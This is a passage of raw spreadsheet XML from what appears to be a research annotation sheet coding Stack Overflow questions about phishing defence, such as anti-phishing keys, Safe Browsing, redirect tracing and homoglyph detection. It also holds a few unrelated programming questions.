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Phish" sheetId="1" r:id="rId4"/>
    <sheet state="visible" name="ITPhish" sheetId="2" r:id="rId5"/>
    <sheet state="visible" name="CodeBookNew" sheetId="3" r:id="rId6"/>
    <sheet state="hidden" name="OLDCodebook" sheetId="4" r:id="rId7"/>
  </sheets>
  <definedNames>
    <definedName hidden="1" localSheetId="1" name="_xlnm._FilterDatabase">ITPhish!$A$1:$AC$934</definedName>
  </definedNames>
  <calcPr/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="9754" uniqueCount="3992">
  <si>
    <t>My code does not work as expected</t>
  </si>
  <si>
    <t>Id</t>
  </si>
  <si>
    <t>PostTypeId</t>
  </si>
  <si>
    <t>AcceptedAnswerId</t>
  </si>
  <si>
    <t>ParentId</t>
  </si>
  <si>
    <t>CreationDate</t>
  </si>
  <si>
    <t>DeletionDate</t>
  </si>
  <si>
    <t>Score</t>
  </si>
  <si>
    <t>ViewCount</t>
  </si>
  <si>
    <t>Final Codes after agreement</t>
  </si>
  <si>
    <t>Agreement</t>
  </si>
  <si>
    <t>MoL2</t>
  </si>
  <si>
    <t>KholoudL2</t>
  </si>
  <si>
    <t>KholoudL3</t>
  </si>
  <si>
    <t>Title</t>
  </si>
  <si>
    <t>Body</t>
  </si>
  <si>
    <t>OwnerUserId</t>
  </si>
  <si>
    <t>OwnerDisplayName</t>
  </si>
  <si>
    <t>LastEditorUserId</t>
  </si>
  <si>
    <t>LastEditorDisplayName</t>
  </si>
  <si>
    <t>LastEditDate</t>
  </si>
  <si>
    <t>LastActivityDate</t>
  </si>
  <si>
    <t>Tags</t>
  </si>
  <si>
    <t>AnswerCount</t>
  </si>
  <si>
    <t>CommentCount</t>
  </si>
  <si>
    <t>FavoriteCount</t>
  </si>
  <si>
    <t>ClosedDate</t>
  </si>
  <si>
    <t>CommunityOwnedDate</t>
  </si>
  <si>
    <t>ContentLicense</t>
  </si>
  <si>
    <t>Notes Mo</t>
  </si>
  <si>
    <t>##########</t>
  </si>
  <si>
    <t>Applying technical defences</t>
  </si>
  <si>
    <t>Agreed</t>
  </si>
  <si>
    <t>Encryption to avoid empersonation</t>
  </si>
  <si>
    <t>Webservice - How to implement an anti phishing key in a service that accept a callback</t>
  </si>
  <si>
    <t>&lt;p&gt;I need to implement a web service that will receive a callback.&lt;/p&gt;
 &lt;p&gt;In my web application I will need to implement something like this:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;http://mywebsite.com/callback?key=[an_anti_phishing_key]&amp;amp;otherparam1=[something1]&amp;amp;otherparam2=[something2]
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;A detailed explanation. There will be a 3rd party service that will request this URL with this parameters. And this service need that I implement an "anti phishing key" so that they can communicate securely with mywebsite.com &lt;/p&gt;
 &lt;p&gt;My doubt here is how to implement this anti phishing key in a secure manner.&lt;/p&gt;
 &lt;p&gt;Any ideas of possible implementations?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;django&gt;&lt;web-services&gt;&lt;security&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>CC BY-SA 3.0</t>
  </si>
  <si>
    <t>Authenticate communication with server</t>
  </si>
  <si>
    <t>Prevent phishing Android apps communicating with server</t>
  </si>
  <si>
    <t>&lt;p&gt;I have created and published on Google Play an Android app that communicates with my server. I want to check that my server (Java Servlet) only accepts requests from this Android app, so that if someone clones my code and creates a new app, when it tries to communicate with the server, the requests are rejected.&lt;/p&gt;
 &lt;p&gt;Is there a way to do that? Perhaps with domain names, or signed apps,...? This is to prevent phishing attacks.&lt;/p&gt;</t>
  </si>
  <si>
    <t>user411103</t>
  </si>
  <si>
    <t>&lt;java&gt;&lt;android&gt;&lt;servlets&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Cannot apply my phishing filter</t>
  </si>
  <si>
    <t>Google Safe Browsing API v2 sample Implementation Android</t>
  </si>
  <si>
    <t>&lt;p&gt;I am trying to implement a Sample application in &lt;strong&gt;Android&lt;/strong&gt; which gets the malware and phishing list from safe Browsing API and checks the authenticity of URL, this is client side method, but I am constantly getting 400 (Bad Request) as response code when I am trying to hit the URL. &lt;/p&gt;
 &lt;p&gt;Searched throughout the internet but couldn't get any sample working code.&lt;/p&gt;
 &lt;p&gt;Even on Developer's Guide page &lt;a href="https://developers.google.com/safe-browsing/developers_guide_v2" rel="nofollow"&gt;https://developers.google.com/safe-browsing/developers_guide_v2&lt;/a&gt; it is not mentioned how to send the list name correctly in POST request for downloading or updating.&lt;/p&gt;
 &lt;p&gt;Please help me by providing the correct procedure of how to send list name (if code snippet can be posted, it would be great as I am new to Android.)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;android&gt;&lt;http-post&gt;&lt;safe-browsing&gt;</t>
  </si>
  <si>
    <t>Looking for a dataset</t>
  </si>
  <si>
    <t>Website url whitelists</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm building a user content parser and am adding an automatic link parser. I'm adding a dialogue, that confirms that the user wants to go to the particular site being linked to. This is for two reasons. Anti phishing and spam combating. However I want to be able to disable both the dialogue and nofollow additions with commonly used websites so I'm building a whitelist. Are there any common whitelists about or should I start building one from scratch?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;url&gt;&lt;whitelist&gt;&lt;phishing&gt;&lt;nofollow&gt;</t>
  </si>
  <si>
    <t>CC BY-SA 2.5</t>
  </si>
  <si>
    <t>Using APIs</t>
  </si>
  <si>
    <t>Regarding Google Safe Browsing API</t>
  </si>
  <si>
    <t>&lt;p&gt;Does anyone know how to use the Google safe browsing API.&lt;/p&gt;
 &lt;p&gt;I downloaded the entire the malware and phish update from the google safe browsing using the API key and tried comparing the hash of the suspicious site (md5_file method in php) but it did not work. I also tried comparing the hash of the suspicious site's url (md5 method in php).&lt;/p&gt;
 &lt;p&gt;Am I doing something wrong here?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;javascript&gt;&lt;firefox&gt;</t>
  </si>
  <si>
    <t>Kholoud's code</t>
  </si>
  <si>
    <t>exclude?</t>
  </si>
  <si>
    <t>Securing the Identity of the Source</t>
  </si>
  <si>
    <t>&lt;p&gt;Alice wants to know from Bob the location of a sensitive resource. Bob Kindly tells Alice the location, but how can Alice be sure of the identity of Bob?&lt;/p&gt;
 &lt;p&gt;Bob is a OpenBSD server, and the source of data is a Python/C++ App.&lt;/p&gt;
 &lt;p&gt;My Idea was: &lt;/p&gt;
 &lt;p&gt;Alice Knows Bob's public Key.&lt;/p&gt;
 &lt;p&gt;Alice encrypt a random string with Bob's Public Key, and send it to Bob.&lt;/p&gt;
 &lt;p&gt;Bob recover the random string, and hash it. Bob send back the sensitive resource, along with the hash.&lt;/p&gt;
 &lt;p&gt;The problem of this method is: Can I safely store a private key on Bob (the server)? How? Is there a better solution?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;cryptography&gt;&lt;digital-signature&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Is it phishing?Automatic detection and reporting</t>
  </si>
  <si>
    <t>I created a code but I want to add a feature</t>
  </si>
  <si>
    <t>Identifying phishing sites using dnstwist in python</t>
  </si>
  <si>
    <t>&lt;p&gt;So I have been trying to use the dnstwist code in my python code as it was initially made for the usage of Linux. 
 In Linux, after importing the code from &lt;a href="https://github.com/elceef/dnstwist" rel="nofollow"&gt;Git&lt;/a&gt;, I have the following code:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;root@:~/dnstwist-master# python dnstwist.py google.com
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;As you may see, I just feed one website to see the results; however, I need to feed a list of websites to that, but in Python. 
 Is there a way I could import it and feed a list of websites on with it? &lt;/p&gt;
 &lt;p&gt;A little help here is much appreciated! &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;dns&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>out?</t>
  </si>
  <si>
    <t>Best tool to follow all redirects including meta-refresh / javascript redirects?</t>
  </si>
  <si>
    <t>&lt;p&gt;Current implementation is in curl. Curl does not seem to be following all of the redirects and I am trying to determine the final page in a redirect sequence. Seeking new options. &lt;/p&gt;
 &lt;p&gt;Complete scan should be completed within 3-5 seconds. &lt;/p&gt;
 &lt;p&gt;The redirects are a mix of 302, 301, meta-refresh, and javascript redirecting. They are typically strung together, mixing different types with the sole purpose of stopping crawlers but allowing legitimate browsers to see the final site. &lt;/p&gt;
 &lt;p&gt;This is a common obfuscation technique in phishing emails. They may use a google search result redirection, then pointing to a Yandex redirection, to a to the final destination. &lt;/p&gt;
 &lt;p&gt;I am not trying to scrape content, just to determine the hops in the redirect chain, and the final url so it can be submitted for evaluation. &lt;/p&gt;
 &lt;p&gt;We have already tried Curl and followed &lt;a href="https://stackoverflow.com/questions/1820705/php-can-curl-follow-meta-redirects"&gt;PHP: Can CURL follow meta redirects&lt;/a&gt; but the techniques vary for each type of document in the chain. &lt;/p&gt;
 &lt;p&gt;The results that I am attempting is to follow the following chains:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;301&lt;/li&gt;
 &lt;li&gt;302&lt;/li&gt;
 &lt;li&gt;303&lt;/li&gt;
 &lt;li&gt;307&lt;/li&gt;
 &lt;li&gt;308&lt;/li&gt;
 &lt;li&gt;Meta-Refresh&lt;/li&gt;
 &lt;li&gt;Javascript redirects &lt;a href="https://love2dev.com/blog/ways-to-use-javascript-redirect-to-another-page/" rel="nofollow noreferrer"&gt;https://love2dev.com/blog/ways-to-use-javascript-redirect-to-another-page/&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;Google results page redirect&lt;/li&gt;
 &lt;li&gt;Yandex redirects&lt;/li&gt;
 &lt;li&gt;Email provider tracking links redirects&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;We often see things like this&lt;/p&gt;
 &lt;p&gt;Email contacts a link:&lt;/p&gt;
 &lt;p&gt;Link type and how it redirects to the next hop. &lt;/p&gt;
 &lt;p&gt;1 -----&gt; 6 -----&gt; 9 ------&gt; 7 ----&gt; final destination&lt;/p&gt;
 &lt;p&gt;What I am trying to determine is the url of each of the steps, and then the final url as seen in a browser.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;curl&gt;&lt;redirect&gt;</t>
  </si>
  <si>
    <t>CC BY-SA 4.0</t>
  </si>
  <si>
    <t>Homoglyph attack detection in email phishing</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;strong&gt;Main Question&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;I am working on an API in Java that needs to detect the use of brands (e.g. PayPal, Mastercard etc.) in phishing emails.&lt;/p&gt;
 &lt;p&gt;Obviously there are different strategies that the attackers use to target these brands so that they are harder to detect. For instance "&lt;em&gt;rnastercard&lt;/em&gt;" looks very similar to "&lt;em&gt;mastercard&lt;/em&gt;" and can fool an unsuspecting user. &lt;/p&gt;
 &lt;p&gt;At this time I can easily detect the misspellings of these brands using a form of fuzzy string search. However the problem I am facing is when the attacker uses homoglyps to change the name of a particular brand but maintains the same visual interpretation. &lt;/p&gt;
 &lt;p&gt;A homoglyph attack substitutes a character from the &lt;strong&gt;[a-zA-Z]&lt;/strong&gt; pattern with a character that looks similar but is outside this range. For example, an attacker using a particular character set can use the &lt;em&gt;Greek Letter RHO&lt;/em&gt; that looks like P to target PayPal. The PayPal brand name in this sort of attack would become : &lt;/p&gt;
 &lt;p&gt;&lt;em&gt;[Greek character RHO][a][y][Greek character RHO][a][l]&lt;/em&gt;&lt;/p&gt;
 &lt;p&gt;Since I have little to no experience with different standards like Unicode or ISO standards and their encodings I am calling upon your advice. Is there a way to programmatically determine the visual equivalent of a character &lt;strong&gt;outside the [a-zA-Z] set&lt;/strong&gt; so that the result would be a character &lt;strong&gt;inside the [a-zA-Z] set&lt;/strong&gt;? &lt;/p&gt;
 &lt;p&gt;Some of your answers might be based on a particular character set, I am looking for a solution that would help me determine such representations for every character set usable inside an email. &lt;/p&gt;
 &lt;p&gt;I have not read the RFC standards for mail exchange but they are on my list, I am asking this question now to save time.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Possible but unworkable solutions&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;I have thought of some solutions but they are not workable for my particular case since they are very CPU intensive and of a hack-like nature (read "may be easily broken").&lt;/p&gt;
 &lt;p&gt;The first solution would be to write the character that is &lt;strong&gt;outside [a-zA-Z]&lt;/strong&gt; in it's form into an image and feed that image to an OCR API to get it's closest &lt;strong&gt;[a-zA-Z]&lt;/strong&gt; representation.&lt;/p&gt;
 &lt;p&gt;The second solution would be to create a map for each character set, the key of the map would be the character itself and the value would be it's &lt;strong&gt;[a-zA-Z]&lt;/strong&gt; equivalent. This map would either have to be done by hand or by using the first solution described above.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Additional details&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;I have already asked this question &lt;a href="https://stackoverflow.com/questions/22327816/conversion-of-unicode-characters-to-their-latin-visual-aproximation"&gt;here&lt;/a&gt;. However the question remained closed despite my editing efforts. Probably because I didn't express myself well and I have not tagged the question properly.&lt;/p&gt;
 &lt;p&gt;In that particular question I also addressed some concerns I had regarding the character sets used by Java which clouded the actual question. However if you feel the need to include such information in your answer I would be grateful since it would save me some time from researching such questions. The question of homoglyph attacks and the question of character sets in Java or *javax.mail.** are separate but linked.&lt;/p&gt;
 &lt;p&gt;As a particular example of a homoglyph attack as described in the main question is &lt;a href="http://pastebin.com/MSSQYBec" rel="nofollow noreferrer"&gt;this email&lt;/a&gt;. BEWARE! That is the actual content of a phishing email using this particular attack method so do not follow any link contained in that email.&lt;/p&gt;
 &lt;p&gt;I've tagged this question with what I thought would be the appropriate tags, if you disagree please provide an edit to this question rather than vote it closed.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;java&gt;&lt;security&gt;&lt;email&gt;&lt;phishing&gt;&lt;homoglyph&gt;</t>
  </si>
  <si>
    <t>Exclude</t>
  </si>
  <si>
    <t>Failing to stop an ongoing attack</t>
  </si>
  <si>
    <t>Exclude, website compromise</t>
  </si>
  <si>
    <t>Hack: anymonious url on my joomla website</t>
  </si>
  <si>
    <t>&lt;p&gt;My website has been hacked again. There are many foreign url such as &lt;a href="http://www.mentarimedia.com/stella-maris-college-chennai-application-form-_xuatn" rel="nofollow"&gt;here&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;I've checked the database and there is nothing strange in my database. Does anyone know what kind of hacked attack like this?&lt;/p&gt;
 &lt;p&gt;Then I have to execute all files with exit (); and I quit "on /libraries/import.legacy.php".&lt;/p&gt;
 &lt;p&gt;If I give exit () under&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;JLoader :: register ('JRoute', JPATH_PLATFORM. '/joomla/application/route.php');
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The result my website is still able to walk with the strange link.&lt;/p&gt;
 &lt;p&gt;but if I give exit() in the above&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;JLoader :: register ('JRoute', JPATH_PLATFORM. '/joomla/application/route.php')
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The result is the website stops.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;joomla&gt;&lt;joomla3.0&gt;&lt;malware&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Trying to implement CFTHREAD...unsuccessfully :(</t>
  </si>
  <si>
    <t>&lt;p&gt;I previously made the post &lt;a href="https://stackoverflow.com/questions/17284118/cfhttp-in-cfloop-limit-use-cfthread"&gt;cfhttp in cfloop limit? use cfthread&lt;/a&gt; regarding making multiple CFHTTP requests to which I implemented the solution of making a XMLHttpRequest in a JS function to call my CFHTTP request from another file.&lt;/p&gt;
 &lt;p&gt;I've amended this so that it runs on an intertval timer but I seem to have an issue in that I'm only allowed by the host to make 3 requests per second but although I may set the interval time to even every 7 seconds I still end up timing out because the CFHTTP requests seem to pend and often make the request at the same time (which means it's taking me through the threshold).&lt;/p&gt;
 &lt;p&gt;I've read Ben Nadel's posts on using CFTHREAD but am having absolutely no joy implementing them at all.&lt;/p&gt;
 &lt;p&gt;My basic process at the moment is:-&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Index.cfm contains a JS function that uses a XMLHttpRequest that calls playerSearch.cfm&lt;/li&gt;
 &lt;li&gt;playerSearch.cfm makes the CFHTTP request.&lt;/li&gt;
 &lt;li&gt;playerSearch.cfm then loops round the response and I display the current item from the loop as well as submitting another CFHTTP request to make a bid on the current item in the loop if it meets any of my IF conditions.&lt;/li&gt;
 &lt;li&gt;Index.cfm then keeps making requests every X amount of seconds.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Is there a way I can set the CFHTTP request itself to make its request every X amount of seconds (maybe using the sleep function in CFTHREAD?) and how would I display anything inside a CFTHREAD as I don't seem to be able to?&lt;/p&gt;
 &lt;p&gt;Also if I were able to make the CFHTTP request itself make the request every X amount of seconds then would I be better just calling that directly and would it keep looping continuously?&lt;/p&gt;
 &lt;p&gt;Any feedback would be much appreciated!&lt;/p&gt;
 &lt;p&gt;EDIT:&lt;/p&gt;
 &lt;p&gt;Index.cfm&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;script&amp;gt;
 var searchTimer = null,
  searchInterval = 1000,
  startPosition = 0;
 function startSearch() {
  if (searchTimer !== null) return;
  searchTimer = setInterval(function () {
  startPosition = startPosition + 16;
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "playerSearch.cfm?startPosition="+startPosition, true);
  xhr.onload = function (e) {
  if (xhr.readyState === 4) {
  if (xhr.status === 200) {
  document.getElementById("counter").innerHTML = xhr.response;
  } else {
  // Error handling
  }
  }
  };
  xhr.onerror = function (e) {
  // Error handling
  };
  xhr.send(null);
  }, searchInterval);
 }
 function stopSearch() {
  clearInterval(searchTimer);
  searchTimer = null
 }
 &amp;lt;/script&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;playerSearch.cfm&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;cfset Variables.startPosition = URL.startPosition /&amp;gt;
 &amp;lt;cfhttp url="https://utas.fut.ea.com/ut/game/fifa13/auctionhouse?type=player" method="post" result="getPlayer"&amp;gt;
  &amp;lt;cfhttpparam type="header" name="Accept" value="application/json" /&amp;gt;
  &amp;lt;cfhttpparam type="header" name="Accept-Language" value="en-GB" /&amp;gt;
  &amp;lt;cfhttpparam type="header" name="Connection" value="keep-alive" /&amp;gt;
  &amp;lt;cfhttpparam type="header" name="Content-Length" value="1" /&amp;gt;
  &amp;lt;cfhttpparam type="header" name="Content-Type" value="application/json" /&amp;gt;
  &amp;lt;cfhttpparam type="header" name="COOKIE" value="#Arguments.cookieString#"&amp;gt;
  &amp;lt;cfhttpparam type="header" name="Host" value="utas.fut.ea.com" /&amp;gt;
  &amp;lt;cfhttpparam type="header" name="Referer" value="http://cdn.easf.www.easports.com/soccer/static/flash/futFifaUltimateTeamPlugin/FifaUltimateTeam.swf" /&amp;gt;
  &amp;lt;cfhttpparam type="header" name="User-Agent" value="Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36" /&amp;gt;
  &amp;lt;cfhttpparam type="header" name="X-HTTP-Method-Override" value="GET" /&amp;gt;
  &amp;lt;cfhttpparam type="header" name="X-UT-Embed-Error" value="true" /&amp;gt;
  &amp;lt;cfhttpparam type="header" name="x-flash-version" value="11,7,700,224" /&amp;gt;
  &amp;lt;cfhttpparam type="header" name="X-UT-SID" value="#Arguments.sessionID#" /&amp;gt;
 &amp;lt;/cfhttp&amp;gt;
 &amp;lt;cfif getPlayer.StatusCode EQ "200 OK"&amp;gt;
  &amp;lt;!--- DESERIALIZE RETURNED JSON SO CAN LOOP ROUND EACH RESULT ---&amp;gt;
  &amp;lt;cfset Variables.searchResults = DeserializeJSON(getPlayer.FileContent) /&amp;gt;
  &amp;lt;!--- IF SEARCH RESULTS RETURNED ---&amp;gt;
  &amp;lt;cfset Variables.numResults = ArrayLen(Variables.searchResults.auctionInfo) /&amp;gt;
  &amp;lt;cfset Variables.bidsMade = 0 /&amp;gt;
  &amp;lt;table width="900" cellpadding="0" cellspacing="0"&amp;gt;
  &amp;lt;tr&amp;gt;
  &amp;lt;th width="100" align="left" class="heading"&amp;gt;Player Name&amp;lt;/th&amp;gt;
  &amp;lt;th width="70" align="left" class="heading"&amp;gt;Rating&amp;lt;/th&amp;gt;
  &amp;lt;th width="50" align="left" class="heading"&amp;gt;Formation&amp;lt;/th&amp;gt;
  &amp;lt;th width="80" align="left" class="heading"&amp;gt;Position&amp;lt;/th&amp;gt;
  &amp;lt;th width="80" align="left" class="heading"&amp;gt;Bid Status&amp;lt;/th&amp;gt;
  &amp;lt;th width="100" align="left" class="heading"&amp;gt;Starting Price&amp;lt;/th&amp;gt;
  &amp;lt;th width="80" align="left" class="heading"&amp;gt;BIN Price&amp;lt;/th&amp;gt;
  &amp;lt;th width="80" align="left" class="heading"&amp;gt;Current Bid&amp;lt;/th&amp;gt;
  &amp;lt;th width="80" align="left" class="heading"&amp;gt;My Bid&amp;lt;/th&amp;gt;
  &amp;lt;th width="120" align="left" class="heading"&amp;gt;Ends&amp;lt;/th&amp;gt;
  &amp;lt;/tr&amp;gt;
  &amp;lt;cfloop from="1" to="#Variables.numResults#" index="i"&amp;gt; 
  &amp;lt;cfscript&amp;gt;
  // DEFAULT BID AMOUNT
  Variables.bidAmount = 0;
  // SET BID AMOUNT
  // IF ITEM HAS BUY NOW PRICE AND IT IS LESS THAN QUICK SELL VALUE THEN BID THAT AMOUNT
  if (Variables.searchResults.auctionInfo[i].buyNowPrice NEQ 0 AND Variables.searchResults.auctionInfo[i].buyNowPrice LT Variables.searchResults.auctionInfo[i].itemData.discardValue) {
  Variables.bidAmount = Variables.searchResults.auctionInfo[i].buyNowPrice;
  }
  // ELSE IF QUICK SELL VALUE IS 228,231,235,238,242,245 OR 249 BID 200
  else if (ListFind("228,231,235,238,242,245,249",Variables.searchResults.auctionInfo[i].itemData.discardValue) AND Variables.searchResults.auctionInfo[i].startingBid LTE 200 AND Variables.searchResults.auctionInfo[i].currentBid LT 200) {
  Variables.bidAmount = 200;
  }
  // ELSE IF QUICK SELL VALUE IS 252,256,259 OR 300 BID 250
  else if (ListFind("252,256,259,300",Variables.searchResults.auctionInfo[i].itemData.discardValue) AND Variables.searchResults.auctionInfo[i].startingBid LTE 250 AND Variables.searchResults.auctionInfo[i].currentBid LT 250) {
  Variables.bidAmount = 250;
  }
  // GET MY CURRENT COIN TOTAL
  Variables.getCoinTotal = Application.cfcs.Club.getCreditsTotal(SESSION.phishingKey,SESSION.sessionKey);
  Variables.curCoinsData = DeserializeJSON(Variables.getCoinTotal.FileContent);
  Variables.curCoins = Variables.curCoinsData.credits;
  // IF I CURRENTLY HAVE ENOUGH COINS IN ACCOUNT PLACE BID
  if (StructKeyExists(Variables,"curCoins") AND Variables.bidAmount NEQ 0 AND Variables.bidAmount LT Variables.curCoins) {
  &amp;lt;cfset Variables.bidData = '{ "bid": ' &amp;amp; Variables.bidAmount &amp;amp; ' }'&amp;gt;
  &amp;lt;cfset Variables.bidDataLength = Len(Variables.bidData) /&amp;gt;
  &amp;lt;cfhttp url="https://utas.fut.ea.com/ut/game/fifa13/trade/" &amp;amp; Variables.searchResults.auctionInfo[i].tradeID &amp;amp; "/bid" method="POST" result="makeBid"&amp;gt;
  &amp;lt;cfhttpparam type="header" name="Accept" value="application/json" /&amp;gt;
  &amp;lt;cfhttpparam type="header" name="Connection" value="keep-alive" /&amp;gt;
  &amp;lt;cfhttpparam type="header" name="Content-Type" value="application/json" /&amp;gt;
  &amp;lt;cfhttpparam type="header" name="Content-Length" value="#Variables.bidDataLength#" /&amp;gt;
  &amp;lt;cfhttpparam type="header" name="Host" value="utas.fut.ea.com" /&amp;gt;
  &amp;lt;cfhttpparam type="header" name="Referer" value="http://cdn.easf.www.easports.com/soccer/static/flash/futFifaUltimateTeamPlugin/FifaUltimateTeam.swf" /&amp;gt;
  &amp;lt;cfhttpparam type="header" name="X-HTTP-Method-Override" value="PUT" /&amp;gt;
  &amp;lt;cfhttpparam type="header" name="X-UT-SID" value="#SESSION.sessionKey#" /&amp;gt;
  &amp;lt;cfhttpparam type="header" name="COOKIE" value="#SESSION.phishingKey#"&amp;gt; 
  &amp;lt;cfhttpparam type="header" name="User-Agent" value="Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36" /&amp;gt;
  &amp;lt;cfhttpparam type="body" value="#Variables.bidData#" /&amp;gt; 
  &amp;lt;/cfhttp&amp;gt;
  Variables.bidsMade = Variables.bidsMade + 1;
  } else {
  Variables.bidAmount = 0;
  }
  &amp;lt;/cfscript&amp;gt;
  &amp;lt;cfoutput&amp;gt;
  &amp;lt;tr&amp;gt;
  &amp;lt;td align="left"&amp;gt;#Variables.searchResults.auctionInfo[i].itemData.assetID#&amp;lt;/td&amp;gt;
  &amp;lt;td align="left"&amp;gt;
  #Variables.searchResults.auctionInfo[i].itemData.rating# 
  &amp;lt;cfif Variables.searchResults.auctionInfo[i].itemData.rareFlag EQ 0&amp;gt;
  &amp;amp;nbsp;
  &amp;lt;cfelseif Variables.searchResults.auctionInfo[i].itemData.rareFlag EQ 1&amp;gt;
  (Rare)
  &amp;lt;cfelse&amp;gt;
  (Something else)
  &amp;lt;/cfif&amp;gt;
  &amp;lt;/td&amp;gt;
  &amp;lt;td align="left"&amp;gt;#Variables.searchResults.auctionInfo[i].itemData.formation#&amp;lt;/td&amp;gt;
  &amp;lt;td align="left"&amp;gt;#Variables.searchResults.auctionInfo[i].itemData.preferredPosition#&amp;lt;/td&amp;gt;
  &amp;lt;td align="left"&amp;gt;#Variables.searchResults.auctionInfo[i].bidState#&amp;lt;/td&amp;gt;
  &amp;lt;td align="left"&amp;gt;#Variables.searchResults.auctionInfo[i].startingBid#&amp;lt;/td&amp;gt;
  &amp;lt;td align="left"&amp;gt;#Variables.searchResults.auctionInfo[i].buyNowPrice#&amp;lt;/td&amp;gt;
  &amp;lt;td align="left"&amp;gt;#Variables.searchResults.auctionInfo[i].currentBid#&amp;lt;/td&amp;gt;
  &amp;lt;td align="left"&amp;gt;#Variables.bidAmount#&amp;lt;/td&amp;gt;
  &amp;lt;td align="left"&amp;gt;
  &amp;lt;cfif Variables.searchResults.auctionInfo[i].tradeState EQ "active"&amp;gt;
  &amp;lt;cfset timeLeft = Variables.searchResults.auctionInfo[i].expires /&amp;gt;
  &amp;lt;cfset auctionEnds = DateAdd("s",timeLeft,Now()) /&amp;gt;
  #DateFormat(Variables.auctionEnds,"dd/mm/yyyy")# #TimeFormat(Variables.auctionEnds,"HH:mm:ss")#
  &amp;lt;cfelse&amp;gt;
  Ended
  &amp;lt;/cfif&amp;gt;
  &amp;lt;/td&amp;gt;
  &amp;lt;/tr&amp;gt;
  &amp;lt;/cfoutput&amp;gt;
  &amp;lt;/cfloop&amp;gt;
  &amp;lt;/table&amp;gt;
  &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;Bids Made: &amp;lt;cfoutput&amp;gt;#Variables.bidsMade#&amp;lt;/cfoutput&amp;gt;
 &amp;lt;cfelse&amp;gt;&amp;lt;br /&amp;gt;
  The search returned an error.
  &amp;lt;cfdump var="#getPlayer#"&amp;gt;
 &amp;lt;/cfif&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;asynchronous&gt;&lt;coldfusion&gt;&lt;xmlhttprequest&gt;&lt;cfhttp&gt;&lt;cfthread&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">New? phishing research and education. </t>
  </si>
  <si>
    <t>C# Hangman Game Error</t>
  </si>
  <si>
    <t>&lt;p&gt;I keep having this error.&lt;/p&gt;
 &lt;p&gt;&lt;em&gt;ArgumentOutOfRangeException was unhandled.
 Index was out of range. Must be non-negative and less than the size of the collection.
 Parameter name: index&lt;/em&gt;&lt;/p&gt;
 &lt;p&gt;Below is the complete code of the form that has the problem and it is where the Hangman game takes place.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;using System;
 using System.Collections.Generic;
 using System.ComponentModel;
 using System.Data;
 using System.Drawing;
 using System.Linq;
 using System.Text;
 using System.Windows.Forms;
 using System.Data.SqlClient;
 namespace Hangman_APPD_Assignment
 {
 public partial class Form2 : Form
 {
  public Form2()
  {
  InitializeComponent();
  }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The List labels = new List(); is the label that the makeLabels() method is going to use it.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; String w = "";
  List&amp;lt;Label&amp;gt; labels = new List&amp;lt;Label&amp;gt;();
  int score = 0, missed = 0, correctCount = 0, gameCount = 1;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The code below is when the user clicks the QUIT button, the application will close.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; private void btnQuit_Click(object sender, EventArgs e)
  {
  Application.Exit();
  }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The code below is when the form loads or shows up, the makeLabels() method is used.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; private void Form2_Load(object sender, EventArgs e)
  {
  makeLabels();
  }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The code below is to use the random word and convert in to a string replacing each alphabet with a symbol '_'. The converted string will be put inside a label called Labels.&lt;/p&gt;
